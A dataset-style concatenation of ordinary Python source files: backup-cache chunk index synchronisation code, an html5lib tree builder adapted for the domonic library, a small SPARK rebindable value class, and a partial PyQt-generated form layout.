get removed and a new master chunks index is built by merging all
archive indexes.
"""
archive_path = os.path.join(self.path, 'chunks.archive.d')
# An index of chunks whose size had to be fetched
chunks_fetched_size_index = ChunkIndex()
# Instrumentation
processed_item_metadata_bytes = 0
processed_item_metadata_chunks = 0
compact_chunks_archive_saved_space = 0
fetched_chunks_for_csize = 0
fetched_bytes_for_csize = 0
def mkpath(id, suffix=''):
id_hex = bin_to_hex(id)
path = os.path.join(archive_path, id_hex + suffix)
return path
def cached_archives():
if self.do_cache:
fns = os.listdir(archive_path)
# filenames with 64 hex digits == 256bit,
# or compact indices which are 64 hex digits + ".compact"
return set(unhexlify(fn) for fn in fns if len(fn) == 64) | \
set(unhexlify(fn[:64]) for fn in fns if len(fn) == 72 and fn.endswith('.compact'))
else:
return set()
def repo_archives():
return set(info.id for info in self.manifest.archives.list())
def cleanup_outdated(ids):
for id in ids:
cleanup_cached_archive(id)
def cleanup_cached_archive(id, cleanup_compact=True):
try:
os.unlink(mkpath(id))
os.unlink(mkpath(id) + '.integrity')
except FileNotFoundError:
pass
if not cleanup_compact:
return
try:
os.unlink(mkpath(id, suffix='.compact'))
os.unlink(mkpath(id, suffix='.compact') + '.integrity')
except FileNotFoundError:
pass
def fetch_missing_csize(chunk_idx):
"""
Archives created with AdHocCache will have csize=0 in all chunk list entries whose
chunks were already in the repository.
Scan *chunk_idx* for entries where csize=0 and fill in the correct information.
"""
nonlocal fetched_chunks_for_csize
nonlocal fetched_bytes_for_csize
all_missing_ids = chunk_idx.zero_csize_ids()
fetch_ids = []
if len(chunks_fetched_size_index):
for id_ in all_missing_ids:
already_fetched_entry = chunks_fetched_size_index.get(id_)
if already_fetched_entry:
entry = chunk_idx[id_]._replace(csize=already_fetched_entry.csize)
assert entry.size == already_fetched_entry.size, 'Chunk size mismatch'
chunk_idx[id_] = entry
else:
fetch_ids.append(id_)
else:
fetch_ids = all_missing_ids
# This is potentially a rather expensive operation, but it's hard to tell at this point
# if it's a problem in practice (hence the experimental status of --no-cache-sync).
for id_, data in zip(fetch_ids, decrypted_repository.repository.get_many(fetch_ids)):
entry = chunk_idx[id_]._replace(csize=len(data))
chunk_idx[id_] = entry
chunks_fetched_size_index[id_] = entry
fetched_chunks_for_csize += 1
fetched_bytes_for_csize += len(data)
def fetch_and_build_idx(archive_id, decrypted_repository, chunk_idx):
nonlocal processed_item_metadata_bytes
nonlocal processed_item_metadata_chunks
csize, data = decrypted_repository.get(archive_id)
chunk_idx.add(archive_id, 1, len(data), csize)
archive = ArchiveItem(internal_dict=msgpack.unpackb(data))
if archive.version != 1:
raise Exception('Unknown archive metadata version')
sync = CacheSynchronizer(chunk_idx)
for item_id, (csize, data) in zip(archive.items, decrypted_repository.get_many(archive.items)):
chunk_idx.add(item_id, 1, len(data), csize)
processed_item_metadata_bytes += len(data)
processed_item_metadata_chunks += 1
sync.feed(data)
if self.do_cache:
fetch_missing_csize(chunk_idx)
write_archive_index(archive_id, chunk_idx)
def write_archive_index(archive_id, chunk_idx):
nonlocal compact_chunks_archive_saved_space
compact_chunks_archive_saved_space += chunk_idx.compact()
fn = mkpath(archive_id, suffix='.compact')
fn_tmp = mkpath(archive_id, suffix='.tmp')
try:
with DetachedIntegrityCheckedFile(path=fn_tmp, write=True,
filename=bin_to_hex(archive_id) + '.compact') as fd:
chunk_idx.write(fd)
except Exception:
truncate_and_unlink(fn_tmp)
else:
os.rename(fn_tmp, fn)
def read_archive_index(archive_id, archive_name):
archive_chunk_idx_path = mkpath(archive_id)
logger.info("Reading cached archive chunk index for %s ...", archive_name)
try:
try:
# Attempt to load compact index first
with DetachedIntegrityCheckedFile(path=archive_chunk_idx_path + '.compact', write=False) as fd:
archive_chunk_idx = ChunkIndex.read(fd, permit_compact=True)
# In case a non-compact index exists, delete it.
cleanup_cached_archive(archive_id, cleanup_compact=False)
# Compact index read - return index, no conversion necessary (below).
return archive_chunk_idx
except FileNotFoundError:
# No compact index found, load non-compact index, and convert below.
with DetachedIntegrityCheckedFile(path=archive_chunk_idx_path, write=False) as fd:
archive_chunk_idx = ChunkIndex.read(fd)
except FileIntegrityError as fie:
logger.error('Cached archive chunk index of %s is corrupted: %s', archive_name, fie)
# Delete corrupted index, set warning. A new index must be build.
cleanup_cached_archive(archive_id)
set_ec(EXIT_WARNING)
return None
# Convert to compact index. Delete the existing index first.
logger.debug('Found non-compact index for %s, converting to compact.', archive_name)
cleanup_cached_archive(archive_id)
write_archive_index(archive_id, archive_chunk_idx)
return archive_chunk_idx
def get_archive_ids_to_names(archive_ids):
# Pass once over all archives and build a mapping from ids to names.
# The easier approach, doing a similar loop for each archive, has
# square complexity and does about a dozen million functions calls
# with 1100 archives (which takes 30s CPU seconds _alone_).
archive_names = {}
for info in self.manifest.archives.list():
if info.id in archive_ids:
archive_names[info.id] = info.name
assert len(archive_names) == len(archive_ids)
return archive_names
def create_master_idx(chunk_idx):
logger.info('Synchronizing chunks cache...')
cached_ids = cached_archives()
archive_ids = repo_archives()
logger.info('Archives: %d, w/ cached Idx: %d, w/ outdated Idx: %d, w/o cached Idx: %d.',
len(archive_ids), len(cached_ids),
len(cached_ids - archive_ids), len(archive_ids - cached_ids))
# deallocates old hashindex, creates empty hashindex:
chunk_idx.clear()
cleanup_outdated(cached_ids - archive_ids)
# Explicitly set the usable initial hash table capacity to avoid performance issues
# due to hash table "resonance".
master_index_capacity = len(self.repository)
if archive_ids:
chunk_idx = None if not self.do_cache else ChunkIndex(usable=master_index_capacity)
pi = ProgressIndicatorPercent(total=len(archive_ids), step=0.1,
msg='%3.0f%% Syncing chunks cache. Processing archive %s',
msgid='cache.sync')
archive_ids_to_names = get_archive_ids_to_names(archive_ids)
for archive_id, archive_name in archive_ids_to_names.items():
pi.show(info=[remove_surrogates(archive_name)])
if self.do_cache:
if archive_id in cached_ids:
archive_chunk_idx = read_archive_index(archive_id, archive_name)
if archive_chunk_idx is None:
cached_ids.remove(archive_id)
if archive_id not in cached_ids:
# Do not make this an else branch; the FileIntegrityError exception handler
# above can remove *archive_id* from *cached_ids*.
logger.info('Fetching and building archive index for %s ...', archive_name)
archive_chunk_idx = ChunkIndex()
fetch_and_build_idx(archive_id, decrypted_repository, archive_chunk_idx)
logger.info("Merging into master chunks index ...")
chunk_idx.merge(archive_chunk_idx)
else:
chunk_idx = chunk_idx or ChunkIndex(usable=master_index_capacity)
logger.info('Fetching archive index for %s ...', archive_name)
fetch_and_build_idx(archive_id, decrypted_repository, chunk_idx)
if not self.do_cache:
fetch_missing_csize(chunk_idx)
pi.finish()
logger.debug('Cache sync: had to fetch %s (%d chunks) because no archive had a csize set for them '
'(due to --no-cache-sync)',
format_file_size(fetched_bytes_for_csize), fetched_chunks_for_csize)
logger.debug('Cache sync: processed %s (%d chunks) of metadata',
format_file_size(processed_item_metadata_bytes), processed_item_metadata_chunks)
logger.debug('Cache sync: compact chunks.archive.d storage saved %s bytes',
format_file_size(compact_chunks_archive_saved_space))
logger.info('Done.')
return chunk_idx
def legacy_cleanup():
"""bring old cache dirs into the desired state (cleanup and adapt)"""
try:
os.unlink(os.path.join(self.path, 'chunks.archive'))
except:
pass
try:
os.unlink(os.path.join(self.path, 'chunks.archive.tmp'))
except:
pass
try:
os.mkdir(archive_path)
except:
pass
# The cache can be used by a command that e.g. only checks against Manifest.Operation.WRITE,
# which does not have to include all flags from Manifest.Operation.READ.
# Since the sync will attempt to read archives, check compatibility with Manifest.Operation.READ.
self.manifest.check_repository_compatibility((Manifest.Operation.READ, ))
self.begin_txn()
with cache_if_remote(self.repository, decrypted_cache=self.key) as decrypted_repository:
legacy_cleanup()
# TEMPORARY HACK: to avoid archive index caching, create a FILE named ~/.cache/borg/REPOID/chunks.archive.d -
# this is only recommended if you have a fast, low latency connection to your repo (e.g. if repo is local disk)
self.do_cache = os.path.isdir(archive_path)
self.chunks = create_master_idx(self.chunks)
def check_cache_compatibility(self):
my_features = Manifest.SUPPORTED_REPO_FEATURES
if self.cache_config.ignored_features & my_features:
# The cache might not contain references of chunks that need a feature that is mandatory for some operation
# and which this version supports. To avoid corruption while executing that operation force rebuild.
return False
if not self.cache_config.mandatory_features <= my_features:
# The cache was build with consideration to at least one feature that this version does not understand.
# This client might misinterpret the cache. Thus force a rebuild.
return False
return True
def wipe_cache(self):
logger.warning("Discarding incompatible cache and forcing a cache rebuild")
archive_path = os.path.join(self.path, 'chunks.archive.d')
if os.path.isdir(archive_path):
shutil.rmtree(os.path.join(self.path, 'chunks.archive.d'))
os.makedirs(os.path.join(self.path, 'chunks.archive.d'))
self.chunks = ChunkIndex()
with SaveFile(os.path.join(self.path, 'files'), binary=True):
pass # empty file
self.cache_config.manifest_id = ''
self.cache_config._config.set('cache', 'manifest', '')
self.cache_config.ignored_features = set()
self.cache_config.mandatory_features = set()
def update_compatibility(self):
operation_to_features_map = self.manifest.get_all_mandatory_features()
my_features = Manifest.SUPPORTED_REPO_FEATURES
repo_features = set()
for operation, features in operation_to_features_map.items():
repo_features.update(features)
self.cache_config.ignored_features.update(repo_features - my_features)
self.cache_config.mandatory_features.update(repo_features & my_features)
def add_chunk(self, id, chunk, stats, overwrite=False, wait=True):
if not self.txn_active:
self.begin_txn()
size = len(chunk)
refcount = self.seen_chunk(id, size)
if refcount and not overwrite:
return self.chunk_incref(id, stats)
data = self.key.encrypt(chunk)
csize = len(data)
self.repository.put(id, data, wait=wait)
self.chunks.add(id, 1, size, csize)
stats.update(size, csize, not refcount)
return ChunkListEntry(id, size, csize)
def seen_chunk(self, id, size=None):
refcount, stored_size, _ = self.chunks.get(id, ChunkIndexEntry(0, None, None))
if size is not None and stored_size is not None and size != stored_size:
# we already have a chunk with that id, but different size.
# this is either a hash collision (unlikely) or corruption or a bug.
raise Exception("chunk has same id [%r], but different size (stored: %d new: %d)!" % (
id, stored_size, size))
return refcount
def chunk_incref(self, id, stats, size=None, part=False):
if not self.txn_active:
self.begin_txn()
count, _size, csize = self.chunks.incref(id)
stats.update(_size, csize, False, part=part)
return ChunkListEntry(id, _size, csize)
def chunk_decref(self, id, stats, wait=True):
if not self.txn_active:
self.begin_txn()
count, size, csize = self.chunks.decref(id)
if count == 0:
del self.chunks[id]
self.repository.delete(id, wait=wait)
stats.update(-size, -csize, True)
else:
stats.update(-size, -csize, False)
def file_known_and_unchanged(self, path_hash, st):
"""
Check if we know the file that has this path_hash (know == it is in our files cache) and
whether it is unchanged (the size/inode number/cmtime is same for stuff we check in this cache_mode).
:param path_hash: hash(file_path), to save some memory in the files cache
:param st: the file's stat() result
:return: known, ids (known is True if we have infos about this file in the cache,
ids is the list of chunk ids IF the file has not changed, otherwise None).
"""
cache_mode = self.cache_mode
if 'd' in cache_mode or not stat.S_ISREG(st.st_mode): # d(isabled)
return False, None
# note: r(echunk) does not need the files cache in this method, but the files cache will
# be updated and saved to disk to memorize the files. To preserve previous generations in
# the cache, this means that it also needs to get loaded from disk first.
if 'r' in cache_mode: # r(echunk)
return False, None
entry = self.files.get(path_hash)
if not entry:
return False, None
# we know the file!
entry = FileCacheEntry(*msgpack.unpackb(entry))
if 's' in cache_mode and entry.size != st.st_size:
return True, None
if 'i' in cache_mode and entry.inode != st.st_ino:
return True, None
if 'c' in cache_mode and bigint_to_int(entry.cmtime) != st.st_ctime_ns:
return True, None
elif 'm' in cache_mode and bigint_to_int(entry.cmtime) != st.st_mtime_ns:
return True, None
# we ignored the inode number in the comparison above or it is still same.
# if it is still the same, replacing it in the tuple doesn't change it.
# if we ignored it, a reason for doing that is that files were moved to a new
# disk / new fs (so a one-time change of inode number is expected) and we wanted
# to avoid everything getting chunked again. to be able to re-enable the inode
# number comparison in a future backup run (and avoid chunking everything
# again at that time), we need to update the inode number in the cache with what
# we see in the filesystem.
self.files[path_hash] = msgpack.packb(entry._replace(inode=st.st_ino, age=0))
return True, entry.chunk_ids
def memorize_file(self, path_hash, st, ids):
cache_mode = self.cache_mode
# note: r(echunk) modes will update the files cache, d(isabled) mode won't
if 'd' in cache_mode or not stat.S_ISREG(st.st_mode):
return
if 'c' in cache_mode:
cmtime_ns = safe_ns(st.st_ctime_ns)
elif 'm' in cache_mode:
cmtime_ns = safe_ns(st.st_mtime_ns)
entry = FileCacheEntry(age=0, inode=st.st_ino, size=st.st_size, cmtime=int_to_bigint(cmtime_ns), chunk_ids=ids)
self.files[path_hash] = msgpack.packb(entry)
self._newest_cmtime = max(self._newest_cmtime or 0, cmtime_ns)
class AdHocCache(CacheStatsMixin):
"""
Ad-hoc, non-persistent cache.
Compared to the standard LocalCache the AdHocCache does not maintain accurate reference count,
nor does it provide a files cache (which would require persistence). Chunks that were not added
during the current AdHocCache lifetime won't have correct size/csize set (0 bytes) and will
have an infinite reference count (MAX_VALUE).
"""
str_format = """\
All archives: unknown unknown unknown
Unique chunks Total chunks
Chunk index: {0.total_unique_chunks:20d} unknown"""
def __init__(self, repository, key, manifest, warn_if_unencrypted=True, lock_wait=None):
self.repository = repository
self.key = key
self.manifest = manifest
self._txn_active = False
self.security_manager = SecurityManager(repository)
self.security_manager.assert_secure(manifest, key, lock_wait=lock_wait)
logger.warning('Note: --no-cache-sync is an experimental feature.')
# Public API
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
files = None
cache_mode = 'd'
def file_known_and_unchanged(self, path_hash, st):
return False, None
def memorize_file(self, path_hash, st, ids):
pass
def add_chunk(self, id, chunk, stats, overwrite=False, wait=True):
assert not overwrite, 'AdHocCache does not permit overwrites — trying to use it for recreate?'
if not self._txn_active:
self.begin_txn()
size = len(chunk)
refcount = self.seen_chunk(id, size)
if refcount:
return self.chunk_incref(id, stats, size=size)
data = self.key.encrypt(chunk)
csize = len(data)
self.repository.put(id, data, wait=wait)
self.chunks.add(id, 1, size, csize)
stats.update(size, csize, not refcount)
return ChunkListEntry(id, size, csize)
def seen_chunk(self, id, size=None):
if not self._txn_active:
self.begin_txn()
entry = self.chunks.get(id, ChunkIndexEntry(0, None, None))
if entry.refcount and size and not entry.size:
# The LocalCache has existing size information and uses *size* to make an effort at detecting collisions.
# This is of course not possible for the AdHocCache.
# Here *size* is used to update the chunk's size information, which will be zero for existing chunks.
self.chunks[id] = entry._replace(size=size)
return entry.refcount
def chunk_incref(self, id, stats, size=None, part=False):
if not self._txn_active:
self.begin_txn()
count, _size, csize = self.chunks.incref(id)
# When _size is 0 and size is not given, then this chunk has not been locally visited yet (seen_chunk with
# size or add_chunk); we can't add references to those (size=0 is invalid) and generally don't try to.
size = _size or size
assert size
stats.update(size, csize, False, part=part)
return ChunkListEntry(id, size, csize)
def chunk_decref(self, id, stats, wait=True):
if not self._txn_active:
self.begin_txn()
count, size, csize = self.chunks.decref(id)
if count == 0:
del self.chunks[id]
self.repository.delete(id, wait=wait)
stats.update(-size, -csize, True)
else:
stats.update(-size, -csize, False)
def commit(self):
if not self._txn_active:
return
self.security_manager.save(self.manifest, self.key)
self._txn_active = False
def rollback(self):
self._txn_active = False
del self.chunks
def begin_txn(self):
self._txn_active = True
# Explicitly set the initial usable hash table capacity to avoid performance issues
# due to hash table "resonance".
# Since we're creating an archive, add 10 % from the start.
num_chunks = len(self.repository)
self.chunks = ChunkIndex(usable=num_chunks * 1.1)
pi = ProgressIndicatorPercent(total=num_chunks, msg='Downloading chunk list... %3.0f%%',
msgid='cache.download_chunks')
t0 = perf_counter()
num_requests = 0
marker = None
while True:
result = self.repository.list(limit=LIST_SCAN_LIMIT, marker=marker)
num_requests += 1
if not result:
break
pi.show(increase=len(result))
marker = result[-1]
# All chunks from the repository have a refcount of MAX_VALUE, which is sticky,
# therefore we can't/won't delete them. Chunks we added ourselves in this transaction
# (e.g. checkpoint archives) are tracked correctly.
init_entry = ChunkIndexEntry(refcount=ChunkIndex.MAX_VALUE, size=0, csize=0)
for id_ in result:
self.chunks[id_] = init_entry
assert len(self.chunks) == num_chunks
# LocalCache does not contain the manifest, either.
del self.chunks[self.manifest.MANIFEST_ID]
duration = perf_counter() - t0 or 0.01
pi.finish()
logger.debug('AdHocCache: downloaded %d chunk IDs in %.2f s (%d requests), ~%s/s',
num_chunks, duration, num_requests, format_file_size(num_chunks * 34 / duration))
# Chunk IDs in a list are encoded in 34 bytes: 1 byte msgpack header, 1 byte length, 32 ID bytes.
# Protocol overhead is neglected in this calculation.
| 46.90583 | 164 | 0.62652 |
3b7cf64bf1f795c1bf4e5edd8f4285df941d1b3a | 11,538 | py | Python | domonic/ext/html5lib_/__init__.py | ArjixWasTaken/domonic | b80433af8c3172b8a15cb62eeca4e6c5add8cb7e | [
"MIT"
] | null | null | null | domonic/ext/html5lib_/__init__.py | ArjixWasTaken/domonic | b80433af8c3172b8a15cb62eeca4e6c5add8cb7e | [
"MIT"
] | null | null | null | domonic/ext/html5lib_/__init__.py | ArjixWasTaken/domonic | b80433af8c3172b8a15cb62eeca4e6c5add8cb7e | [
"MIT"
] | null | null | null | """
domonic.ext.html5lib_
====================================
stolen from here and modded to work with domonic instead of mindidom
https://github.com/html5lib/html5lib-python/blob/master/html5lib/treebuilders/__init__.py
"""
'''
from __future__ import absolute_import, division, unicode_literals
# from .._utils import default_etree
treeBuilderCache = {}
def getTreeBuilder(treeType, implementation='domonic', **kwargs):
treeType = treeType.lower()
if treeType not in treeBuilderCache:
if treeType == "domonic":
from . import dom
if implementation is None:
from xml.dom import minidom
implementation = minidom
return dom.getDomModule(implementation, **kwargs).TreeBuilder
else:
raise ValueError("""domonic treebuilder required "%s" """ % treeType)
return treeBuilderCache.get(treeType)
'''
# from __future__ import absolute_import, division, unicode_literals
try:
from collections.abc import MutableMapping
except ImportError: # Python 2.7
from collections import MutableMapping
# from xml.dom import minidom, Node
import weakref
from html5lib import constants
from html5lib._utils import moduleFactoryFactory
from html5lib.constants import namespaces
from html5lib.treebuilders import base
from domonic.dom import DOMImplementation, Node
# from . import base
# from .. import constants
# from ..constants import namespaces
# from .._utils import moduleFactoryFactory
# def getDomBuilder(DomImplementation):
# Dom = DomImplementation
def getDomBuilder(ignore):
# Dom = DomImplementation
class AttrList(MutableMapping):
def __init__(self, element):
self.element = element
def __iter__(self):
return iter(self.element.attributes.keys())
def __setitem__(self, name, value):
if isinstance(name, tuple):
raise NotImplementedError
else:
attr = self.element.ownerDocument.createAttribute(name)
attr.value = value
self.element.attributes[name] = attr
def __len__(self):
return len(self.element.attributes)
def items(self):
# print(self.element, self.element.attributes)
# return list(self.element.attributes.items())
return list(self.element.attributes.items())
# return self.element.attributes
def values(self):
return list(self.element.attributes.values())
def __getitem__(self, name):
if isinstance(name, tuple):
raise NotImplementedError
else:
# print(self.element)
# print(self.element.attributes, name)
try:
return self.element.attributes[name].value
except Exception as e:
# print(e)
# print('failed on :', name) # TODO
return ""
def __delitem__(self, name):
if isinstance(name, tuple):
raise NotImplementedError
else:
del self.element.attributes[name]
class NodeBuilder(base.Node):
def __init__(self, element):
# NOTE requires tagname to be correct as it checks that against keys in namespaces.
# i.e '#document' needs to be converted to 'html'.
# base.Node.__init__(self, element.nodeName)
base.Node.__init__(self, element.name)
self.element = element
namespace = property(lambda self: hasattr(self.element, "namespaceURI") and self.element.namespaceURI or None)
def appendChild(self, node):
node.parent = self
self.element.appendChild(node.element)
def insertText(self, data, insertBefore=None):
# Dont create empty text nodes
if data.isspace():
return
text = self.element.ownerDocument.createTextNode(data)
if insertBefore:
self.element.insertBefore(text, insertBefore.element)
else:
self.element.appendChild(text)
def insertBefore(self, node, refNode):
self.element.insertBefore(node.element, refNode.element)
node.parent = self
def removeChild(self, node):
if node.element.parentNode == self.element:
self.element.removeChild(node.element)
node.parent = None
def reparentChildren(self, newParent):
while self.element.hasChildNodes():
child = self.element.firstChild
self.element.removeChild(child)
newParent.element.appendChild(child)
self.childNodes = []
def getAttributes(self):
return AttrList(self.element)
def setAttributes(self, attributes):
if attributes:
for name, value in list(attributes.items()):
if isinstance(name, tuple):
if name[0] is not None:
qualifiedName = name[0] + ":" + name[1]
else:
qualifiedName = name[1]
self.element.setAttributeNS(name[2], qualifiedName, value)
else:
self.element.setAttribute(name, value)
attributes = property(getAttributes, setAttributes)
def cloneNode(self):
return NodeBuilder(self.element.cloneNode(False))
def hasContent(self):
return self.element.hasChildNodes()
def getNameTuple(self):
if self.namespace is None:
return namespaces["html"], self.name
else:
return self.namespace, self.name
nameTuple = property(getNameTuple)
class TreeBuilder(base.TreeBuilder): # pylint:disable=unused-variable
def documentClass(self):
# self.dom = Dom.getDOMImplementation().createDocument(None, None, None)
self.dom = DOMImplementation().createDocument(None, None, None)
return weakref.proxy(self)
def insertDoctype(self, token):
name = token["name"]
publicId = token["publicId"]
systemId = token["systemId"]
# domimpl = Dom.getDOMImplementation()
domimpl = DOMImplementation()
doctype = domimpl.createDocumentType(name, publicId, systemId)
self.document.appendChild(NodeBuilder(doctype))
# if Dom == minidom:
doctype.ownerDocument = self.dom
def elementClass(self, name, namespace=None):
if namespace is None and self.defaultNamespace is None:
node = self.dom.createElement(name)
else:
node = self.dom.createElementNS(namespace, name)
return NodeBuilder(node)
def commentClass(self, data):
return NodeBuilder(self.dom.createComment(data))
def fragmentClass(self):
return NodeBuilder(self.dom.createDocumentFragment())
def appendChild(self, node):
from domonic.dom import HTMLDocument
if isinstance(self.dom, HTMLDocument) and isinstance(node.element, HTMLDocument):
# print('HERE IS THE PROBLEM!!!!')
# TODO - this can't be the final solution as a nested html would replace the outer
self.dom = node.element
# transfer all props from node.element to self.dom
# self.dom.__dict__.update(node.element.__dict__)
# self.dom.appendChild(node.element)
else:
self.dom.appendChild(node.element)
def testSerializer(self, element):
return testSerializer(element)
def getDocument(self):
return self.dom
def getFragment(self):
return base.TreeBuilder.getFragment(self).element
def insertText(self, data, parent=None):
data = data
if parent != self:
base.TreeBuilder.insertText(self, data, parent)
else:
# HACK: allow text nodes as children of the document node
if hasattr(self.dom, "_child_node_types"):
# pylint:disable=protected-access
if Node.TEXT_NODE not in self.dom._child_node_types:
self.dom._child_node_types = list(self.dom._child_node_types)
self.dom._child_node_types.append(Node.TEXT_NODE)
self.dom.appendChild(self.dom.createTextNode(data))
from xml.dom import minidom
implementation = minidom # DomImplementation
name = None
def testSerializer(element):
element.normalize()
rv = []
def serializeElement(element, indent=0):
if element.nodeType == Node.DOCUMENT_TYPE_NODE:
if element.name:
if element.publicId or element.systemId:
publicId = element.publicId or ""
systemId = element.systemId or ""
rv.append("""|%s<!DOCTYPE %s "%s" "%s">""" % (" " * indent, element.name, publicId, systemId))
else:
rv.append("|%s<!DOCTYPE %s>" % (" " * indent, element.name))
else:
rv.append("|%s<!DOCTYPE >" % (" " * indent,))
elif element.nodeType == Node.DOCUMENT_NODE:
rv.append("#document")
elif element.nodeType == Node.DOCUMENT_FRAGMENT_NODE:
rv.append("#document-fragment")
elif element.nodeType == Node.COMMENT_NODE:
rv.append("|%s<!-- %s -->" % (" " * indent, element.nodeValue))
elif element.nodeType == Node.TEXT_NODE:
rv.append('|%s"%s"' % (" " * indent, element.nodeValue))
else:
if hasattr(element, "namespaceURI") and element.namespaceURI is not None:
name = "%s %s" % (constants.prefixes[element.namespaceURI], element.nodeName)
else:
name = element.nodeName
rv.append("|%s<%s>" % (" " * indent, name))
if element.hasAttributes():
attributes = []
for i in range(len(element.attributes)):
attr = element.attributes.item(i)
name = attr.nodeName
value = attr.value
ns = attr.namespaceURI
if ns:
name = "%s %s" % (constants.prefixes[ns], attr.localName)
else:
name = attr.nodeName
attributes.append((name, value))
for name, value in sorted(attributes):
rv.append('|%s%s="%s"' % (" " * (indent + 2), name, value))
indent += 2
for child in element.childNodes:
serializeElement(child, indent)
serializeElement(element, 0)
return "\n".join(rv)
return locals()
# The actual means to get a module!
getDomModule = moduleFactoryFactory(getDomBuilder)
# if implementation is None:
from xml.dom import minidom
implementation = minidom
def getTreeBuilder():
return getDomModule(implementation).TreeBuilder
| 36.745223 | 118 | 0.571503 |
4bd3ea42d694e0b49d6334542a235422d832e6fb | 3,699 | py | Python | src/spark/lang/rebindable.py | jbalint/spark | caccf1cd9122dd4a7dc0f26a57ee4a649056aa6f | [
"CNRI-Jython"
] | 1 | 2015-05-21T20:00:12.000Z | 2015-05-21T20:00:12.000Z | src/spark/lang/rebindable.py | jbalint/spark | caccf1cd9122dd4a7dc0f26a57ee4a649056aa6f | [
"CNRI-Jython"
] | null | null | null | src/spark/lang/rebindable.py | jbalint/spark | caccf1cd9122dd4a7dc0f26a57ee4a649056aa6f | [
"CNRI-Jython"
] | null | null | null | #*****************************************************************************#
#* Copyright (c) 2004-2008, SRI International. *#
#* All rights reserved. *#
#* *#
#* Redistribution and use in source and binary forms, with or without *#
#* modification, are permitted provided that the following conditions are *#
#* met: *#
#* * Redistributions of source code must retain the above copyright *#
#* notice, this list of conditions and the following disclaimer. *#
#* * Redistributions in binary form must reproduce the above copyright *#
#* notice, this list of conditions and the following disclaimer in the *#
#* documentation and/or other materials provided with the distribution. *#
#* * Neither the name of SRI International nor the names of its *#
#* contributors may be used to endorse or promote products derived from *#
#* this software without specific prior written permission. *#
#* *#
#* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS *#
#* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT *#
#* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR *#
#* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT *#
#* OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, *#
#* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT *#
#* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, *#
#* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY *#
#* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT *#
#* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE *#
#* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. *#
#*****************************************************************************#
#* "$Revision:: 129 $" *#
#* "$HeadURL:: https://svn.ai.sri.com/projects/spark/trunk/spark/src/spar#$" *#
#*****************************************************************************#
from spark.internal.version import *
from spark.internal.parse.basicvalues import value_str
from spark.internal.parse.values_common import isList
from types import TupleType as List
from types import ListType
class RebindableObject(object):
__slots__ = (
"value",
)
def __init__(self, v=None):
if v is None:
v = []
self.set_value(v)
def set_value(self, v):
if isList(v):
self.value = list(v)
else:
self.value = v
return True
def get_value(self):
if isinstance(self.value, ListType):
return List(self.value)
else:
return self.value
def add_value(self, obj):
if isinstance(self.value, ListType):
self.value.append(obj)
else:
self.value += obj
return True
def remove_value(self, obj):
if isinstance(self.value, ListType):
self.value.remove(obj)
else:
self.value -= obj
return True
def __str__(self):
return "<Rebindable:%s>"%value_str(self.get_value())
def __repr__(self):
return self.__str__()
| 46.822785 | 80 | 0.530143 |
5d95fcf3690b9edae8391b9d2572374037645103 | 2,822 | py | Python | ui/page_elements/condition_box/boxUI.py | ArcherLuo233/election-s-prediction | 9da72cb855f6d61f9cdec6e15f7ca832629ba51a | [
"MIT"
] | null | null | null | ui/page_elements/condition_box/boxUI.py | ArcherLuo233/election-s-prediction | 9da72cb855f6d61f9cdec6e15f7ca832629ba51a | [
"MIT"
] | 1 | 2022-01-26T01:23:26.000Z | 2022-01-26T01:23:34.000Z | ui/page_elements/condition_box/boxUI.py | ArcherLuo233/election-s-prediction | 9da72cb855f6d61f9cdec6e15f7ca832629ba51a | [
"MIT"
] | 1 | 2021-11-08T10:58:23.000Z | 2021-11-08T10:58:23.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'box.ui'
#
# Created by: PyQt5 UI code generator 5.15.0
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(276, 186)
font = QtGui.QFont()
font.setFamily("华文新魏")
font.setPointSize(12)
Form.setFont(font)
self.horizontalLayout = QtWidgets.QHBoxLayout(Form)
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setSpacing(0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.frame = QtWidgets.QFrame(Form)
self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame.setFrameShadow(QtWidgets.QFrame.Plain)
self.frame.setObjectName("frame")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.frame)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.comboBox = QtWidgets.QComboBox(self.frame)
font = QtGui.QFont()
font.setFamily("华文新魏")
font.setPointSize(17)
self.comboBox.setFont(font)
self.comboBox.setObjectName("comboBox")
self.horizontalLayout_2.addWidget(self.comboBox)
self.lineEdit = QtWidgets.QLineEdit(self.frame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lineEdit.sizePolicy().hasHeightForWidth())
self.lineEdit.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setFamily("华文新魏")
font.setPointSize(17)
self.lineEdit.setFont(font)
self.lineEdit.setObjectName("lineEdit")
self.horizontalLayout_2.addWidget(self.lineEdit)
self.btn_delete = QtWidgets.QPushButton(self.frame)
font = QtGui.QFont()
font.setFamily("华文新魏")
font.setPointSize(14)
self.btn_delete.setFont(font)
